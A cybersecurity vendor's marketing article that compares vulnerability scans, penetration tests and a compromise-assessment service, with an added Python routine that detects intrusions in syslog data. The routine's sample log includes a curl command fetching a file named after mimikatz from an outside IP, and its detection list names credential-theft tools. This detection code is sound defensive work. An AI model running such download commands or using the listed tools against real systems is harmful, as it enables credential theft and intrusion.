A Security Guard, a Burglar & a SWAT Team: Choosing the Right Mix of Cybersecurity Assessments
By Andrew Roberts, Chief Cybersecurity Strategist, cStor
In a previous article, Penetration Testing: Get More Value From Your Assessment Dollar, we discussed the differences between vulnerability scans and penetration tests, the reasons for doing them and made the case for rotating your tests and testers to get maximum value. Both assessments are necessary and good investments that every company should make regularly, but they also have limitations. At cStor, we have been working to overcome those limitations.
To help explain, consider the following real-world analogies for vulnerability scans and penetration tests:
A Vulnerability Scan is like hiring a security guard to come to your building and check the outside perimeter. They will check every door and window and make sure they are all locked. While walking around outside, they will also look for any obvious holes that have neither a door nor a window and could be easily used to gain access. Their report will tell you about anything that was unlocked, but they never actually enter the building, so they can’t tell you anything about what is inside.
A Penetration Test is like hiring a burglar to come to your building and try to break in. They will check the perimeter for open holes with no doors or windows and will check for unlocked doors and windows, just as a vulnerability scan does, but they will also try to pick the locks on those doors and windows. If you have a talented and resourceful penetration tester, they may even climb on the roof and look there for ways to get in. Their report will tell you about holes found and will let you know if any locks could be picked to gain access. However, they still won’t be able to tell you much about the inside of your building, because the rules of engagement usually say that, even if they get in, they can’t just roam around the inside and check every closet and corner; they must stop where they are and go back outside.
Vulnerability scans and penetration tests provide valuable information and can give you a reasonable assurance that your perimeter is secure, but they have limitations. There are times when you need more.
Introducing Our Latest Offering: cStor Compromise Assessment, Powered by Cylance Consulting
cStor and BlackBerry Cylance have joined forces to offer a unique assessment designed to determine if your systems are currently, or ever have been, breached. cStor’s specialists will deploy a lightweight, self-dissolving script in your environment to gather a variety of relevant data. That data is then analyzed by BlackBerry Cylance’s AI to highlight areas of weakness, such as improper configurations, unsupported operating systems and applications, deprecated (and easily broken) encryption protocols still in use, and more. The assessment will also identify past and present unauthorized activity in your environment, such as credential harvesting, attacker techniques in use, hacking tools installed, brute-force attacks, successful and unsuccessful attempts to elevate privileges, and data exfiltration, to name a few.
Staying with our real-world analogy, think of the cStor Compromise Assessment as inviting a SWAT team to come inside your building and do a thorough search of every inch to make sure that nobody is inside that does not belong there. They will systematically sweep the building, checking every corner, every closet and every hiding place to verify that all are unoccupied. While they are inside, they will also dust for fingerprints to make sure that no unauthorized person was ever inside the building. They will also check the internal security and point out areas that can be improved.
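To make the "fingerprint dusting" concrete, here is a small log-triage routine of the kind a compromise assessment runs over collected host data. It is an added example written for this article, not cStor's or BlackBerry Cylance's collection script. The log lines are constructed OpenSSH/sudo-style syslog entries, and the thresholds and the short list of tool names are assumptions chosen for illustration. It flags three of the indicators listed above: a brute-force burst from one source, a successful login right after that burst (a likely harvested credential), a denied privilege-elevation attempt, and a known hacking tool being fetched.

```python
"""Log-triage routine in the spirit of a compromise assessment.

Added example, not vendor code. Sample log lines are constructed;
FAIL_THRESHOLD, WINDOW_SECONDS and SUSPICIOUS_TOOLS are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime

FAIL_THRESHOLD = 5      # assumption: 5 failed logins from one source ...
WINDOW_SECONDS = 120    # ... within two minutes is treated as brute force
# Assumption: an illustrative list of tool names worth flagging in commands.
SUSPICIOUS_TOOLS = ("mimikatz", "psexec", "lazagne", "procdump")

# Constructed sample: syslog-format auth events (no year in the timestamp).
SAMPLE_LOG = """\
Mar 10 02:14:01 web1 sshd[2210]: Failed password for invalid user admin from 203.0.113.45 port 51234 ssh2
Mar 10 02:14:03 web1 sshd[2211]: Failed password for root from 203.0.113.45 port 51236 ssh2
Mar 10 02:14:05 web1 sshd[2212]: Failed password for root from 203.0.113.45 port 51238 ssh2
Mar 10 02:14:07 web1 sshd[2213]: Failed password for root from 203.0.113.45 port 51240 ssh2
Mar 10 02:14:09 web1 sshd[2214]: Failed password for root from 203.0.113.45 port 51242 ssh2
Mar 10 02:14:12 web1 sshd[2215]: Accepted password for root from 203.0.113.45 port 51244 ssh2
Mar 10 02:15:30 web1 sudo: root : TTY=pts/0 ; PWD=/root ; USER=root ; COMMAND=/usr/bin/curl -o /tmp/mimikatz.exe http://198.51.100.9/m.exe
Mar 10 09:00:00 web1 sshd[3001]: Failed password for alice from 192.0.2.10 port 40000 ssh2
Mar 10 09:00:20 web1 sshd[3002]: Accepted publickey for alice from 192.0.2.10 port 40002 ssh2
Mar 10 09:05:00 web1 sudo:    bob : user NOT in sudoers ; TTY=pts/1 ; PWD=/home/bob ; USER=root ; COMMAND=/bin/bash
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) "
    r"(?P<proc>[^:\[]+)(?:\[\d+\])?: (?P<msg>.*)$"
)
SSH_RE = re.compile(
    r"^(?P<result>Failed|Accepted) \w+ for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+)"
)
SUDO_DENIED_RE = re.compile(r"^\s*(?P<user>\S+) : user NOT in sudoers")
SUDO_CMD_RE = re.compile(r"COMMAND=(?P<cmd>.*)$")


def parse(line, year=2024):
    """Split one syslog line into timestamp, host, process and message."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "host": m["host"], "proc": m["proc"], "msg": m["msg"]}


def assess(log_text):
    """Return (kind, subject, detail) findings for the indicators above."""
    events = [e for e in (parse(l) for l in log_text.splitlines()) if e]
    findings = []
    failures = defaultdict(list)  # source IP -> timestamps of recent failures
    for e in events:
        if e["proc"] == "sshd":
            m = SSH_RE.match(e["msg"])
            if not m:
                continue
            ip = m["ip"]
            # Keep only failures inside the sliding window for this source.
            recent = [t for t in failures[ip]
                      if (e["ts"] - t).total_seconds() <= WINDOW_SECONDS]
            if m["result"] == "Failed":
                recent.append(e["ts"])
                if len(recent) == FAIL_THRESHOLD:
                    findings.append(("brute_force", ip,
                                     f"{FAIL_THRESHOLD} failed logins within {WINDOW_SECONDS}s"))
            elif len(recent) >= FAIL_THRESHOLD:
                # A success right after a burst suggests a guessed/harvested credential.
                findings.append(("brute_force_success", ip,
                                 f"login as {m['user']} after {len(recent)} failures"))
            failures[ip] = recent
        elif e["proc"] == "sudo":
            user = e["msg"].split(":")[0].strip()
            if SUDO_DENIED_RE.match(e["msg"]):
                findings.append(("privesc_attempt", user, "sudo denied"))
            cm = SUDO_CMD_RE.search(e["msg"])
            if cm and any(t in cm["cmd"].lower() for t in SUSPICIOUS_TOOLS):
                findings.append(("hacking_tool", user, cm["cmd"]))
    return findings


if __name__ == "__main__":
    for kind, subject, detail in assess(SAMPLE_LOG):
        print(f"{kind:20} {subject:15} {detail}")
```

Run against the constructed sample, the routine reports the brute-force burst from 203.0.113.45, the root login that immediately followed it, the curl fetch of a file named after a credential-theft tool, and bob's denied sudo; alice's single typo followed by a key-based login produces no finding. A real assessment runs the same kind of logic across many hosts and data sources, which is exactly what the perimeter-only tests above cannot see.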
When is a good time for a compromise assessment?
- When you suspect your systems have been breached. A compromise assessment could confirm or disprove your suspicions – and help target your response and shorten your remediation efforts should your fears be confirmed.
- When acquiring another company. A compromise assessment should be an important part of your due diligence process. Whether or not the acquired business is or ever has been breached is a material fact that would greatly impact the acquisition decision and price. You need to know about a breach before you buy the company; otherwise, that breach is your problem and your liability.
- When you hope to be acquired. A breach discovered during the M&A process could have a profound impact on the purchase price and could kill a deal completely. Make sure you get the maximum value for your company by identifying and correcting any issues before a deal is on the table. Letting potential buyers know that this assessment has been done and your environment is clean may make you a more attractive acquisition target.
- When there are changes in executive leadership. As a new CEO, CIO or CISO, you need to know if your new organization has been breached so you can address that issue immediately. It is already your responsibility; make sure you know about a breach – and act – before it also becomes your fault.
- When vulnerability scans and penetration tests are routine. If you have been checking your perimeter regularly and are reasonably certain that it is secure, it’s time to take your assessments to the next level and look inside to confirm that nobody is or has been acting inside your perimeter.
- When doing your very first vulnerability scan or penetration test. If you have not been looking at your perimeter regularly, there is an increased chance that you have been breached. It won’t help to lock down the perimeter if someone has already established a persistent foothold. Find them, kick them out and lock the doors so they can’t get back in.
cStor’s cybersecurity experts can help you find the right mix of vulnerability scans, penetration tests and compromise assessments to increase the effectiveness of your ongoing assessment plans. If you would like more information about cStor’s Compromise Assessment, powered by Cylance Consulting, you can reach out to me, your cStor Account Manager, or email us at email@example.com.